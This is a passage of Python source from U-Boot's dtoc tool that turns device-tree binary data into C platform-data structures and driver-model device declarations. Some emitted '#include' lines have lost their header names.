'fdt64_t',\n}\n\nSTRUCT_PREFIX = 'dtd_'\nVAL_PREFIX = 'dtv_'\n\n# Properties which are considered to be phandles\n# key: property name\n# value: name of associated #cells property in the target node\n#\n# New phandle properties must be added here; otherwise they will come through as\n# simple integers and finding devices by phandle will not work.\n# Any property that ends with one of these (e.g. 'cd-gpios') will be considered\n# a phandle property.\nPHANDLE_PROPS = {\n 'clocks': '#clock-cells',\n 'interrupts-extended': '#interrupt-cells',\n 'gpios': '#gpio-cells',\n 'sandbox,emul': '#emul-cells',\n }\n\nclass Ftype(IntEnum):\n SOURCE, HEADER = range(2)\n\n\n# This holds information about each type of output file dtoc can create\n# ftype: Type of file (Ftype)\n# fname: Filename excluding directory, e.g. 'dt-plat.c'\n# hdr_comment: Comment explaining the purpose of the file\nOutputFile = collections.namedtuple('OutputFile',\n ['ftype', 'fname', 'method', 'hdr_comment'])\n\n# This holds information about a property which includes phandles.\n#\n# max_args: integer: Maximum number or arguments that any phandle uses (int).\n# args: Number of args for each phandle in the property. The total number of\n# phandles is len(args). This is a list of integers.\nPhandleInfo = collections.namedtuple('PhandleInfo', ['max_args', 'args'])\n\n# Holds a single phandle link, allowing a C struct value to be assigned to point\n# to a device\n#\n# var_node: C variable to assign (e.g. 'dtv_mmc.clocks[0].node')\n# dev_name: Name of device to assign to (e.g. 'clock')\nPhandleLink = collections.namedtuple('PhandleLink', ['var_node', 'dev_name'])\n\n\ndef tab_to(num_tabs, line):\n \"\"\"Append tabs to a line of text to reach a tab stop.\n\n Args:\n num_tabs (int): Tab stop to obtain (0 = column 0, 1 = column 8, etc.)\n line (str): Line of text to append to\n\n Returns:\n str: line with the correct number of tabs appeneded. If the line already\n extends past that tab stop then a single space is appended.\n \"\"\"\n if len(line) >= num_tabs * 8:\n return line + ' '\n return line + '\\t' * (num_tabs - len(line) // 8)\n\ndef get_value(ftype, value):\n \"\"\"Get a value as a C expression\n\n For integers this returns a byte-swapped (little-endian) hex string\n For bytes this returns a hex string, e.g. 0x12\n For strings this returns a literal string enclosed in quotes\n For booleans this return 'true'\n\n Args:\n ftype (fdt.Type): Data type (fdt_util)\n value (bytes): Data value, as a string of bytes\n\n Returns:\n str: String representation of the value\n \"\"\"\n if ftype == fdt.Type.INT:\n val = '%#x' % fdt_util.fdt32_to_cpu(value)\n elif ftype == fdt.Type.BYTE:\n char = value[0]\n val = '%#x' % (ord(char) if isinstance(char, str) else char)\n elif ftype == fdt.Type.STRING:\n # Handle evil ACPI backslashes by adding another backslash before them.\n # So \"\\\\_SB.GPO0\" in the device tree effectively stays like that in C\n val = '\"%s\"' % value.replace('\\\\', '\\\\\\\\')\n elif ftype == fdt.Type.BOOL:\n val = 'true'\n else: # ftype == fdt.Type.INT64:\n val = '%#x' % value\n return val\n\n\nclass DtbPlatdata():\n \"\"\"Provide a means to convert device tree binary data to platform data\n\n The output of this process is C structures which can be used in space-\n constrained encvironments where the ~3KB code overhead of device tree\n code is not affordable.\n\n Properties:\n _scan: Scan object, for scanning and reporting on useful information\n from the U-Boot source code\n _fdt: Fdt object, referencing the device tree\n _dtb_fname: Filename of the input device tree binary file\n _valid_nodes_unsorted: A list of Node object with compatible strings,\n ordered by devicetree node order\n _valid_nodes: A list of Node object with compatible strings, ordered by\n conv_name_to_c(node.name)\n _include_disabled: true to include nodes marked status = \"disabled\"\n _outfile: The current output file (sys.stdout or a real file)\n _lines: Stashed list of output lines for outputting in the future\n _dirname: Directory to hold output files, or None for none (all files\n go to stdout)\n _struct_data (dict): OrderedDict of dtplat structures to output\n key (str): Node name, as a C identifier\n value: dict containing structure fields:\n key (str): Field name\n value: Prop object with field information\n _basedir (str): Base directory of source tree\n _valid_uclasses (list of src_scan.Uclass): List of uclasses needed for\n the selected devices (see _valid_node), in alphabetical order\n _instantiate: Instantiate devices so they don't need to be bound at\n run-time\n \"\"\"\n def __init__(self, scan, dtb_fname, include_disabled, instantiate=False):\n self._scan = scan\n self._fdt = None\n self._dtb_fname = dtb_fname\n self._valid_nodes = None\n self._valid_nodes_unsorted = None\n self._include_disabled = include_disabled\n self._outfile = None\n self._lines = []\n self._dirnames = [None] * len(Ftype)\n self._struct_data = collections.OrderedDict()\n self._basedir = None\n self._valid_uclasses = None\n self._instantiate = instantiate\n\n def setup_output_dirs(self, output_dirs):\n \"\"\"Set up the output directories\n\n This should be done before setup_output() is called\n\n Args:\n output_dirs (tuple of str):\n Directory to use for C output files.\n Use None to write files relative current directory\n Directory to use for H output files.\n Defaults to the C output dir\n \"\"\"\n def process_dir(ftype, dirname):\n if dirname:\n os.makedirs(dirname, exist_ok=True)\n self._dirnames[ftype] = dirname\n\n if output_dirs:\n c_dirname = output_dirs[0]\n h_dirname = output_dirs[1] if len(output_dirs) > 1 else c_dirname\n process_dir(Ftype.SOURCE, c_dirname)\n process_dir(Ftype.HEADER, h_dirname)\n\n def setup_output(self, ftype, fname):\n \"\"\"Set up the output destination\n\n Once this is done, future calls to self.out() will output to this\n file. The file used is as follows:\n\n self._dirnames[ftype] is None: output to fname, or stdout if None\n self._dirnames[ftype] is not None: output to fname in that directory\n\n Calling this function multiple times will close the old file and open\n the new one. If they are the same file, nothing happens and output will\n continue to the same file.\n\n Args:\n ftype (str): Type of file to create ('c' or 'h')\n fname (str): Filename to send output to. If there is a directory in\n self._dirnames for this file type, it will be put in that\n directory\n \"\"\"\n dirname = self._dirnames[ftype]\n if dirname:\n pathname = os.path.join(dirname, fname)\n if self._outfile:\n self._outfile.close()\n self._outfile = open(pathname, 'w')\n elif fname:\n if not self._outfile:\n self._outfile = open(fname, 'w')\n else:\n self._outfile = sys.stdout\n\n def finish_output(self):\n \"\"\"Finish outputing to a file\n\n This closes the output file, if one is in use\n \"\"\"\n if self._outfile != sys.stdout:\n self._outfile.close()\n self._outfile = None\n\n def out(self, line):\n \"\"\"Output a string to the output file\n\n Args:\n line (str): String to output\n \"\"\"\n self._outfile.write(line)\n\n def buf(self, line):\n \"\"\"Buffer up a string to send later\n\n Args:\n line (str): String to add to our 'buffer' list\n \"\"\"\n self._lines.append(line)\n\n def get_buf(self):\n \"\"\"Get the contents of the output buffer, and clear it\n\n Returns:\n list(str): The output buffer, which is then cleared for future use\n \"\"\"\n lines = self._lines\n self._lines = []\n return lines\n\n def out_header(self, outfile):\n \"\"\"Output a message indicating that this is an auto-generated file\n\n Args:\n outfile: OutputFile describing the file being generated\n \"\"\"\n self.out('''/*\n * DO NOT MODIFY\n *\n * %s.\n * This was generated by dtoc from a .dtb (device tree binary) file.\n */\n\n''' % outfile.hdr_comment)\n\n def get_phandle_argc(self, prop, node_name):\n \"\"\"Check if a node contains phandles\n\n We have no reliable way of detecting whether a node uses a phandle\n or not. As an interim measure, use a list of known property names.\n\n Args:\n prop (fdt.Prop): Prop object to check\n node_name (str): Node name, only used for raising an error\n Returns:\n int or None: Number of argument cells is this is a phandle,\n else None\n Raises:\n ValueError: if the phandle cannot be parsed or the required property\n is not present\n \"\"\"\n cells_prop = None\n for name, cprop in PHANDLE_PROPS.items():\n if prop.name.endswith(name):\n cells_prop = cprop\n if cells_prop:\n if not isinstance(prop.value, list):\n prop.value = [prop.value]\n val = prop.value\n i = 0\n\n max_args = 0\n args = []\n while i < len(val):\n phandle = fdt_util.fdt32_to_cpu(val[i])\n # If we get to the end of the list, stop. This can happen\n # since some nodes have more phandles in the list than others,\n # but we allocate enough space for the largest list. So those\n # nodes with shorter lists end up with zeroes at the end.\n if not phandle:\n break\n target = self._fdt.phandle_to_node.get(phandle)\n if not target:\n raise ValueError(\"Cannot parse '%s' in node '%s'\" %\n (prop.name, node_name))\n cells = target.props.get(cells_prop)\n if not cells:\n raise ValueError(\"Node '%s' has no cells property\" %\n target.name)\n num_args = fdt_util.fdt32_to_cpu(cells.value)\n max_args = max(max_args, num_args)\n args.append(num_args)\n i += 1 + num_args\n return PhandleInfo(max_args, args)\n return None\n\n def scan_dtb(self):\n \"\"\"Scan the device tree to obtain a tree of nodes and properties\n\n Once this is done, self._fdt.GetRoot() can be called to obtain the\n device tree root node, and progress from there.\n \"\"\"\n self._fdt = fdt.FdtScan(self._dtb_fname)\n\n def scan_node(self, node, valid_nodes):\n \"\"\"Scan a node and subnodes to build a tree of node and phandle info\n\n This adds each subnode to self._valid_nodes if it is enabled and has a\n compatible string.\n\n Args:\n node (Node): Node for scan for subnodes\n valid_nodes (list of Node): List of Node objects to add to\n \"\"\"\n for subnode in node.subnodes:\n if 'compatible' in subnode.props:\n status = subnode.props.get('status')\n if (not self._include_disabled and not status or\n status.value != 'disabled'):\n valid_nodes.append(subnode)\n\n # recurse to handle any subnodes\n self.scan_node(subnode, valid_nodes)\n\n def scan_tree(self, add_root):\n \"\"\"Scan the device tree for useful information\n\n This fills in the following properties:\n _valid_nodes_unsorted: A list of nodes we wish to consider include\n in the platform data (in devicetree node order)\n _valid_nodes: Sorted version of _valid_nodes_unsorted\n\n Args:\n add_root: True to add the root node also (which wouldn't normally\n be added as it may not have a compatible string)\n \"\"\"\n root = self._fdt.GetRoot()\n valid_nodes = []\n if add_root:\n valid_nodes.append(root)\n self.scan_node(root, valid_nodes)\n self._valid_nodes_unsorted = valid_nodes\n self._valid_nodes = sorted(valid_nodes,\n key=lambda x: conv_name_to_c(x.name))\n\n def prepare_nodes(self):\n \"\"\"Add extra properties to the nodes we are using\n\n The following properties are added for use by dtoc:\n idx: Index number of this node (0=first, etc.)\n struct_name: Name of the struct dtd used by this node\n var_name: C name for this node\n child_devs: List of child devices for this node, each a None\n child_refs: Dict of references for each child:\n key: Position in child list (-1=head, 0=first, 1=second, ...\n n-1=last, n=head)\n seq: Sequence number of the device (unique within its uclass), or\n -1 not not known yet\n dev_ref: Reference to this device, e.g. 'DM_DEVICE_REF(serial)'\n driver: Driver record for this node, or None if not known\n uclass: Uclass record for this node, or None if not known\n uclass_seq: Position of this device within the uclass list (0=first,\n n-1=last)\n parent_seq: Position of this device within it siblings (0=first,\n n-1=last)\n parent_driver: Driver record of the node's parent, or None if none.\n We don't use node.parent.driver since node.parent may not be in\n the list of valid nodes\n \"\"\"\n for idx, node in enumerate(self._valid_nodes):\n node.idx = idx\n node.struct_name, _ = self._scan.get_normalized_compat_name(node)\n node.var_name = conv_name_to_c(node.name)\n node.child_devs = []\n node.child_refs = {}\n node.seq = -1\n node.dev_ref = None\n node.driver = None\n node.uclass = None\n node.uclass_seq = None\n node.parent_seq = None\n node.parent_driver = None\n\n @staticmethod\n def get_num_cells(node):\n \"\"\"Get the number of cells in addresses and sizes for this node\n\n Args:\n node (fdt.None): Node to check\n\n Returns:\n Tuple:\n Number of address cells for this node\n Number of size cells for this node\n \"\"\"\n parent = node.parent\n if parent and not parent.props:\n raise ValueError(\"Parent node '%s' has no properties - do you need bootph-pre-ram or similar?\" %\n parent.path)\n num_addr, num_size = 2, 2\n if parent:\n addr_prop = parent.props.get('#address-cells')\n size_prop = parent.props.get('#size-cells')\n if addr_prop:\n num_addr = fdt_util.fdt32_to_cpu(addr_prop.value)\n if size_prop:\n num_size = fdt_util.fdt32_to_cpu(size_prop.value)\n return num_addr, num_size\n\n def scan_reg_sizes(self):\n \"\"\"Scan for 64-bit 'reg' properties and update the values\n\n This finds 'reg' properties with 64-bit data and converts the value to\n an array of 64-values. This allows it to be output in a way that the\n C code can read.\n \"\"\"\n for node in self._valid_nodes:\n reg = node.props.get('reg')\n if not reg:\n continue\n num_addr, num_size = self.get_num_cells(node)\n total = num_addr + num_size\n\n if reg.type != fdt.Type.INT:\n raise ValueError(\"Node '%s' reg property is not an int\" %\n node.name)\n if not isinstance(reg.value, list):\n reg.value = [reg.value]\n if len(reg.value) % total:\n raise ValueError(\n \"Node '%s' (parent '%s') reg property has %d cells \"\n 'which is not a multiple of na + ns = %d + %d)' %\n (node.name, node.parent.name, len(reg.value), num_addr,\n num_size))\n reg.num_addr = num_addr\n reg.num_size = num_size\n if num_addr > 1 or num_size > 1:\n reg.type = fdt.Type.INT64\n i = 0\n new_value = []\n val = reg.value\n while i < len(val):\n addr = fdt_util.fdt_cells_to_cpu(val[i:], reg.num_addr)\n i += num_addr\n size = fdt_util.fdt_cells_to_cpu(val[i:], reg.num_size)\n i += num_size\n new_value += [addr, size]\n reg.value = new_value\n\n def scan_structs(self):\n \"\"\"Scan the device tree building up the C structures we will use.\n\n Build a dict keyed by C struct name containing a dict of Prop\n object for each struct field (keyed by property name). Where the\n same struct appears multiple times, try to use the 'widest'\n property, i.e. the one with a type which can express all others.\n\n Once the widest property is determined, all other properties are\n updated to match that width.\n\n The results are written to self._struct_data\n \"\"\"\n structs = self._struct_data\n for node in self._valid_nodes:\n fields = {}\n\n # Get a list of all the valid properties in this node.\n for name, prop in node.props.items():\n if name not in PROP_IGNORE_LIST and name[0] != '#':\n fields[name] = copy.deepcopy(prop)\n\n # If we've seen this struct_name before, update the existing struct\n if node.struct_name in structs:\n struct = structs[node.struct_name]\n for name, prop in fields.items():\n oldprop = struct.get(name)\n if oldprop:\n oldprop.Widen(prop)\n else:\n struct[name] = prop\n\n # Otherwise store this as a new struct.\n else:\n structs[node.struct_name] = fields\n\n for node in self._valid_nodes:\n struct = structs[node.struct_name]\n for name, prop in node.props.items():\n if name not in PROP_IGNORE_LIST and name[0] != '#':\n prop.Widen(struct[name])\n\n def scan_phandles(self):\n \"\"\"Figure out what phandles each node uses\n\n We need to be careful when outputing nodes that use phandles since\n they must come after the declaration of the phandles in the C file.\n Otherwise we get a compiler error since the phandle struct is not yet\n declared.\n\n This function adds to each node a list of phandle nodes that the node\n depends on. This allows us to output things in the right order.\n \"\"\"\n for node in self._valid_nodes:\n node.phandles = set()\n for pname, prop in node.props.items():\n if pname in PROP_IGNORE_LIST or pname[0] == '#':\n continue\n info = self.get_phandle_argc(prop, node.name)\n if info:\n # Process the list as pairs of (phandle, id)\n pos = 0\n for args in info.args:\n phandle_cell = prop.value[pos]\n phandle = fdt_util.fdt32_to_cpu(phandle_cell)\n target_node = self._fdt.phandle_to_node[phandle]\n node.phandles.add(target_node)\n pos += 1 + args\n\n\n def generate_structs(self):\n \"\"\"Generate struct defintions for the platform data\n\n This writes out the body of a header file consisting of structure\n definitions for node in self._valid_nodes. See the documentation in\n doc/driver-model/of-plat.rst for more information.\n \"\"\"\n structs = self._struct_data\n self.out('#include \\n')\n self.out('#include \\n')\n\n # Output the struct definition\n for name in sorted(structs):\n self.out('struct %s%s {\\n' % (STRUCT_PREFIX, name))\n for pname in sorted(structs[name]):\n prop = structs[name][pname]\n info = self.get_phandle_argc(prop, structs[name])\n if info:\n # For phandles, include a reference to the target\n struct_name = 'struct phandle_%d_arg' % info.max_args\n self.out('\\t%s%s[%d]' % (tab_to(2, struct_name),\n conv_name_to_c(prop.name),\n len(info.args)))\n else:\n ptype = TYPE_NAMES[prop.type]\n self.out('\\t%s%s' % (tab_to(2, ptype),\n conv_name_to_c(prop.name)))\n if isinstance(prop.value, list):\n self.out('[%d]' % len(prop.value))\n self.out(';\\n')\n self.out('};\\n')\n\n def _output_list(self, node, prop):\n \"\"\"Output the C code for a devicetree property that holds a list\n\n Args:\n node (fdt.Node): Node to output\n prop (fdt.Prop): Prop to output\n \"\"\"\n self.buf('{')\n vals = []\n # For phandles, output a reference to the platform data\n # of the target node.\n info = self.get_phandle_argc(prop, node.name)\n if info:\n # Process the list as pairs of (phandle, id)\n pos = 0\n for args in info.args:\n phandle_cell = prop.value[pos]\n phandle = fdt_util.fdt32_to_cpu(phandle_cell)\n target_node = self._fdt.phandle_to_node[phandle]\n arg_values = []\n for i in range(args):\n arg_values.append(\n str(fdt_util.fdt32_to_cpu(prop.value[pos + 1 + i])))\n pos += 1 + args\n vals.append('\\t{%d, {%s}}' % (target_node.idx,\n ', '.join(arg_values)))\n for val in vals:\n self.buf('\\n\\t\\t%s,' % val)\n else:\n for val in prop.value:\n vals.append(get_value(prop.type, val))\n\n # Put 8 values per line to avoid very long lines.\n for i in range(0, len(vals), 8):\n if i:\n self.buf(',\\n\\t\\t')\n self.buf(', '.join(vals[i:i + 8]))\n self.buf('}')\n\n def _declare_device(self, node):\n \"\"\"Add a device declaration to the output\n\n This declares a U_BOOT_DRVINFO() for the device being processed\n\n Args:\n node: Node to process\n \"\"\"\n self.buf('U_BOOT_DRVINFO(%s) = {\\n' % node.var_name)\n self.buf('\\t.name\\t\\t= \"%s\",\\n' % node.struct_name)\n self.buf('\\t.plat\\t\\t= &%s%s,\\n' % (VAL_PREFIX, node.var_name))\n self.buf('\\t.plat_size\\t= sizeof(%s%s),\\n' %\n (VAL_PREFIX, node.var_name))\n idx = -1\n if node.parent and node.parent in self._valid_nodes:\n idx = node.parent.idx\n self.buf('\\t.parent_idx\\t= %d,\\n' % idx)\n self.buf('};\\n')\n self.buf('\\n')\n\n def prep_priv(self, struc, name, suffix, section='.priv_data'):\n if not struc:\n return None\n var_name = '_%s%s' % (name, suffix)\n hdr = self._scan._structs.get(struc)\n if hdr:\n self.buf('#include <%s>\\n' % hdr.fname)\n else:\n print('Warning: Cannot find header file for struct %s' % struc)\n attr = '__attribute__ ((section (\"%s\")))' % section\n return var_name, struc, attr\n\n def alloc_priv(self, info, name, extra, suffix='_priv'):\n result = self.prep_priv(info, name, suffix)\n if not result:\n return None\n var_name, struc, section = result\n self.buf('u8 %s_%s[sizeof(struct %s)]\\n\\t%s;\\n' %\n (var_name, extra, struc.strip(), section))\n return '%s_%s' % (var_name, extra)\n\n def alloc_plat(self, info, name, extra, node):\n result = self.prep_priv(info, name, '_plat')\n if not result:\n return None\n var_name, struc, section = result\n self.buf('struct %s %s\\n\\t%s_%s = {\\n' %\n (struc.strip(), section, var_name, extra))\n self.buf('\\t.dtplat = {\\n')\n for pname in sorted(node.props):\n self._output_prop(node, node.props[pname], 2)\n self.buf('\\t},\\n')\n self.buf('};\\n')\n return '&%s_%s' % (var_name, extra)\n\n def _declare_device_inst(self, node, parent_driver):\n \"\"\"Add a device instance declaration to the output\n\n This declares a DM_DEVICE_INST() for the device being processed\n\n Args:\n node: Node to output\n \"\"\"\n driver = node.driver\n uclass = node.uclass\n self.buf('\\n')\n num_lines = len(self._lines)\n plat_name = self.alloc_plat(driver.plat, driver.name, node.var_name,\n node)\n priv_name = self.alloc_priv(driver.priv, driver.name, node.var_name)\n parent_plat_name = None\n parent_priv_name = None\n if parent_driver:\n # TODO: deal with uclass providing these values\n parent_plat_name = self.alloc_priv(\n parent_driver.child_plat, driver.name, node.var_name,\n '_parent_plat')\n parent_priv_name = self.alloc_priv(\n parent_driver.child_priv, driver.name, node.var_name,\n '_parent_priv')\n uclass_plat_name = self.alloc_priv(\n uclass.per_dev_plat, driver.name + '_uc', node.var_name, 'plat')\n uclass_priv_name = self.alloc_priv(uclass.per_dev_priv,\n driver.name + '_uc', node.var_name)\n for hdr in driver.headers:\n self.buf('#include %s\\n' % hdr)\n\n # Add a blank line if we emitted any stuff above, for readability\n if num_lines != len(self._lines):\n self.buf('\\n')\n\n self.buf('DM_DEVICE_INST(%s) = {\\n' % node.var_name)\n self.buf('\\t.driver\\t\\t= DM_DRIVER_REF(%s),\\n' % node.struct_name)\n self.buf('\\t.name\\t\\t= \"%s\",\\n' % node.struct_name)\n if plat_name:\n self.buf('\\t.plat_\\t\\t= %s,\\n' % plat_name)\n else:\n self.buf('\\t.plat_\\t\\t= &%s%s,\\n' % (VAL_PREFIX, node.var_name))\n if parent_plat_name:\n self.buf('\\t.parent_plat_\\t= %s,\\n' % parent_plat_name)\n if uclass_plat_name:\n self.buf('\\t.uclass_plat_\\t= %s,\\n' % uclass_plat_name)\n driver_date = None\n\n if node != self._fdt.GetRoot():\n compat_list = node.props['compatible'].value\n if not isinstance(compat_list, list):\n compat_list = [compat_list]\n for compat in compat_list:\n driver_data = driver.compat.get(compat)\n if driver_data:\n self.buf('\\t.driver_data\\t= %s,\\n' % driver_data)\n break\n\n if node.parent and node.parent.parent:\n if node.parent not in self._valid_nodes:\n # This might indicate that the parent node is not in the\n # SPL/TPL devicetree but the child is. For example if we are\n # dealing with of-platdata in TPL, the parent has a\n # bootph-pre-sram tag but the child has bootph-all. In\n # this case the child node exists in TPL but the parent does\n # not.\n raise ValueError(\"Node '%s' requires parent node '%s' but it is not in the valid list\" %\n (node.path, node.parent.path))\n self.buf('\\t.parent\\t\\t= DM_DEVICE_REF(%s),\\n' %\n node.parent.var_name)\n if priv_name:\n self.buf('\\t.priv_\\t\\t= %s,\\n' % priv_name)\n self.buf('\\t.uclass\\t\\t= DM_UCLASS_REF(%s),\\n' % uclass.name)\n\n if uclass_priv_name:\n self.buf('\\t.uclass_priv_ = %s,\\n' % uclass_priv_name)\n if parent_priv_name:\n self.buf('\\t.parent_priv_\\t= %s,\\n' % parent_priv_name)\n self.list_node('uclass_node', uclass.node_refs, node.uclass_seq)\n self.list_head('child_head', 'sibling_node', node.child_devs, node.var_name)\n if node.parent in self._valid_nodes:\n self.list_node('sibling_node', node.parent.child_refs,\n node.parent_seq)\n # flags is left as 0\n\n self.buf('\\t.seq_ = %d,\\n' % node.seq)\n\n self.buf('};\\n')\n self.buf('\\n')\n return parent_plat_name\n\n def _output_prop(self, node, prop, tabs=1):\n \"\"\"Output a line containing the value of a struct member\n\n Args:\n node (Node): Node being output\n prop (Prop): Prop object to output\n \"\"\"\n if prop.name in PROP_IGNORE_LIST or prop.name[0] == '#':\n return\n member_name = conv_name_to_c(prop.name)\n self.buf('%s%s= ' % ('\\t' * tabs, tab_to(3, '.' + member_name)))\n\n # Special handling for lists\n if isinstance(prop.value, list):\n self._output_list(node, prop)\n else:\n self.buf(get_value(prop.type, prop.value))\n self.buf(',\\n')\n\n def _output_values(self, node):\n \"\"\"Output the definition of a device's struct values\n\n Args:\n node (Node): Node to output\n \"\"\"\n self.buf('static struct %s%s %s%s = {\\n' %\n (STRUCT_PREFIX, node.struct_name, VAL_PREFIX, node.var_name))\n for pname in sorted(node.props):\n self._output_prop(node, node.props[pname])\n self.buf('};\\n')\n\n def list_head(self, head_member, node_member, node_refs, var_name):\n self.buf('\\t.%s\\t= {\\n' % head_member)\n if node_refs:\n last = node_refs[-1].dev_ref\n first = node_refs[0].dev_ref\n member = node_member\n else:\n last = 'DM_DEVICE_REF(%s)' % var_name\n first = last\n member = head_member\n self.buf('\\t\\t.prev = &%s->%s,\\n' % (last, member))\n self.buf('\\t\\t.next = &%s->%s,\\n' % (first, member))\n self.buf('\\t},\\n')\n\n def list_node(self, member, node_refs, seq):\n self.buf('\\t.%s\\t= {\\n' % member)\n self.buf('\\t\\t.prev = %s,\\n' % node_refs[seq - 1])\n self.buf('\\t\\t.next = %s,\\n' % node_refs[seq + 1])\n self.buf('\\t},\\n')\n\n def generate_uclasses(self):\n self.out('\\n')\n self.out('#include \\n')\n self.out('#include \\n')\n self.out('#include \\n')\n self.out('\\n')\n self.buf('/*\\n')\n self.buf(\n \" * uclass declarations, ordered by 'struct uclass' linker_list idx:\\n\")\n uclass_list = self._valid_uclasses\n for seq, uclass in enumerate(uclass_list):\n self.buf(' * %3d: %s\\n' % (seq, uclass.name))\n self.buf(' *\\n')\n self.buf(' * Sequence numbers allocated in each uclass:\\n')\n for uclass in uclass_list:\n if uclass.alias_num_to_node:\n self.buf(' * %s: %s\\n' % (uclass.name, uclass.uclass_id))\n for seq, node in uclass.alias_num_to_node.items():\n self.buf(' * %d: %s\\n' % (seq, node.path))\n self.buf(' */\\n')\n\n uclass_node = {}\n for seq, uclass in enumerate(uclass_list):\n uclass_node[seq] = ('&DM_UCLASS_REF(%s)->sibling_node' %\n uclass.name)\n uclass_node[-1] = '&uclass_head'\n uclass_node[len(uclass_list)] = '&uclass_head'\n self.buf('\\n')\n self.buf('struct list_head %s = {\\n' % 'uclass_head')\n self.buf('\\t.prev = %s,\\n' % uclass_node[len(uclass_list) -1])\n self.buf('\\t.next = %s,\\n' % uclass_node[0])\n self.buf('};\\n')\n self.buf('\\n')\n\n for seq, uclass in enumerate(uclass_list):\n uc_drv = self._scan._uclass.get(uclass.uclass_id)\n\n priv_name = self.alloc_priv(uc_drv.priv, uc_drv.name, '')\n\n self.buf('DM_UCLASS_INST(%s) = {\\n' % uclass.name)\n if priv_name:\n self.buf('\\t.priv_\\t\\t= %s,\\n' % priv_name)\n self.buf('\\t.uc_drv\\t\\t= DM_UCLASS_DRIVER_REF(%s),\\n' % uclass.name)\n self.list_node('sibling_node', uclass_node, seq)\n self.list_head('dev_head', 'uclass_node', uc_drv.devs, None)\n self.buf('};\\n')\n self.buf('\\n')\n self.out(''.join(self.get_buf()))\n\n def read_aliases(self):\n \"\"\"Read the aliases and attach the information to self._alias\n\n Raises:\n ValueError: The alias path is not found\n \"\"\"\n alias_node = self._fdt.GetNode('/aliases')\n if not alias_node:\n return\n re_num = re.compile('(^[a-z0-9-]+[a-z]+)([0-9]+)$')\n for prop in alias_node.props.values():\n m_alias = re_num.match(prop.name)\n if not m_alias:\n raise ValueError(\"Cannot decode alias '%s'\" % prop.name)\n name, num = m_alias.groups()\n node = self._fdt.GetNode(prop.value)\n result = self._scan.add_uclass_alias(name, num, node)\n if result is None:\n raise ValueError(\"Alias '%s' path '%s' not found\" %\n (prop.name, prop.value))\n elif result is False:\n print(\"Could not find uclass for alias '%s'\" % prop.name)\n\n def generate_decl(self):\n nodes_to_output = list(self._valid_nodes)\n\n self.buf('#include \\n')\n self.buf('#include \\n')\n self.buf('\\n')\n self.buf(\n '/* driver declarations - these allow DM_DRIVER_GET() to be used */\\n')\n for node in nodes_to_output:\n self.buf('extern U_BOOT_DRIVER(%s);\\n' % node.struct_name);\n self.buf('\\n')\n\n if self._instantiate:\n self.buf(\n '/* device declarations - these allow DM_DEVICE_REF() to be used */\\n')\n for node in nodes_to_output:\n self.buf('extern DM_DEVICE_INST(%s);\\n' % node.var_name)\n self.buf('\\n')\n\n uclass_list = self._valid_uclasses\n\n self.buf(\n '/* uclass driver declarations - needed for DM_UCLASS_DRIVER_REF() */\\n')\n for uclass in uclass_list:\n self.buf('extern UCLASS_DRIVER(%s);\\n' % uclass.name)\n\n if self._instantiate:\n self.buf('\\n')\n self.buf('/* uclass declarations - needed for DM_UCLASS_REF() */\\n')\n for uclass in uclass_list:\n self.buf('extern DM_UCLASS_INST(%s);\\n' % uclass.name)\n self.out(''.join(self.get_buf()))\n\n def assign_seqs(self):\n \"\"\"Assign a sequence number to each node\"\"\"\n for node in self._valid_nodes_unsorted:\n seq = self._scan.assign_seq(node)\n if seq is not None:\n node.seq = seq\n\n def process_nodes(self, need_drivers):\n nodes_to_output = list(self._valid_nodes)\n\n # Figure out which drivers we actually use\n self._scan.mark_used(nodes_to_output)\n\n for node in nodes_to_output:\n node.dev_ref = 'DM_DEVICE_REF(%s)' % node.var_name\n driver = self._scan.get_driver(node.struct_name)\n if not driver:\n if not need_drivers:\n continue\n raise ValueError(\"Cannot parse/find driver for '%s'\" %\n node.struct_name)\n node.driver = driver\n uclass = self._scan._uclass.get(driver.uclass_id)\n if not uclass:\n raise ValueError(\"Cannot parse/find uclass '%s' for driver '%s'\" %\n (driver.uclass_id, node.struct_name))\n node.uclass = uclass\n node.uclass_seq = len(node.uclass.devs)\n node.uclass.devs.append(node)\n uclass.node_refs[node.uclass_seq] = \\\n '&%s->uclass_node' % node.dev_ref\n\n parent_driver = None\n if node.parent in self._valid_nodes:\n parent_driver = self._scan.get_driver(node.parent.struct_name)\n if not parent_driver:\n if not need_drivers:\n continue\n raise ValueError(\n \"Cannot parse/find parent driver '%s' for '%s'\" %\n (node.parent.struct_name, node.struct_name))\n node.parent_seq = len(node.parent.child_devs)\n node.parent.child_devs.append(node)\n node.parent.child_refs[node.parent_seq] = \\\n '&%s->sibling_node' % node.dev_ref\n node.parent_driver = parent_driver\n\n for node in nodes_to_output:\n ref = '&%s->child_head' % node.dev_ref\n node.child_refs[-1] = ref\n node.child_refs[len(node.child_devs)] = ref\n\n uclass_set = set()\n for driver in self._scan._drivers.values():\n if driver.used and driver.uclass:\n uclass_set.add(driver.uclass)\n self._valid_uclasses = sorted(list(uclass_set),\n key=lambda uc: uc.uclass_id)\n\n for seq, uclass in enumerate(uclass_set):\n ref = '&DM_UCLASS_REF(%s)->dev_head' % uclass.name\n uclass.node_refs[-1] = ref\n uclass.node_refs[len(uclass.devs)] = ref\n\n def output_node_plat(self, node):\n \"\"\"Output the C code for a node\n\n Args:\n node (fdt.Node): node to output\n \"\"\"\n driver = node.driver\n parent_driver = node.parent_driver\n\n line1 = 'Node %s index %d' % (node.path, node.idx)\n if driver:\n self.buf('/*\\n')\n self.buf(' * %s\\n' % line1)\n self.buf(' * driver %s parent %s\\n' % (driver.name,\n parent_driver.name if parent_driver else 'None'))\n self.buf(' */\\n')\n else:\n self.buf('/* %s */\\n' % line1)\n\n self._output_values(node)\n self._declare_device(node)\n\n self.out(''.join(self.get_buf()))\n\n def output_node_instance(self, node):\n \"\"\"Output the C code for a node\n\n Args:\n node (fdt.Node): node to output\n \"\"\"\n parent_driver = node.parent_driver\n\n self.buf('/*\\n')\n self.buf(' * Node %s index %d\\n' % (node.path, node.idx))\n self.buf(' * driver %s parent %s\\n' % (node.driver.name,\n parent_driver.name if parent_driver else 'None'))\n self.buf('*/\\n')\n\n if not node.driver.plat:\n self._output_values(node)\n self._declare_device_inst(node, parent_driver)\n\n self.out(''.join(self.get_buf()))\n\n def generate_plat(self):\n \"\"\"Generate device defintions for the platform data\n\n This writes out C platform data initialisation data and\n U_BOOT_DRVINFO() declarations for each valid node. Where a node has\n multiple compatible strings, a #define is used to make them equivalent.\n\n See the documentation in doc/driver-model/of-plat.rst for more\n information.\n \"\"\"\n self.out('/* Allow use of U_BOOT_DRVINFO() in this file */\\n')\n self.out('#define DT_PLAT_C\\n')\n self.out('\\n')\n 